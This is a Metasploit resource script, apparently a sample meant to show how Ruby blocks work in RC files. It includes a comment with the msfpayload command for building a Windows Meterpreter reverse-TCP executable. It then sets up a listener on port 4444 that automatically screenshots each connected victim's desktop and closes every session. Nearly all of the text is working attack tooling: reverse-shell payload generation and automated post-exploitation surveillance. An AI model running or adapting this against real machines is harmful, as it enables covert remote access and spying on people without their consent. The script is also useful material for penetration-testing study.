# # Quick RC script to demonstrate the Ruby blocks in RC files # # # Generate a corresponding EXE using msfpayload (change to your IP): # $ msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 X > reverse.exe # use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LPORT 4444 set LHOST set ExitOnSession false exploit -j # The first sleep below is not necessary, but makes the output cleaner sleep(1) print_status("Waiting on an incoming sessions...") while (true) framework.sessions.each_pair do |sid,s| thost = s.tunnel_peer.split(":")[0] # Ensure that stdapi has been loaded before running if s.ext.aliases['stdapi'] print_status("Screenshotting session #{sid} #{thost}...") s.console.run_single("screenshot -p #{thost}_#{sid}.jpg -v false -q 85") print_status("Closing session #{sid} #{thost}...") s.kill else print_status("Session #{sid} #{thost} active, but not yet configured") end end sleep(1) end print_status("All done") # Kill all open sessions sessions -K # Exit the console (optional) exit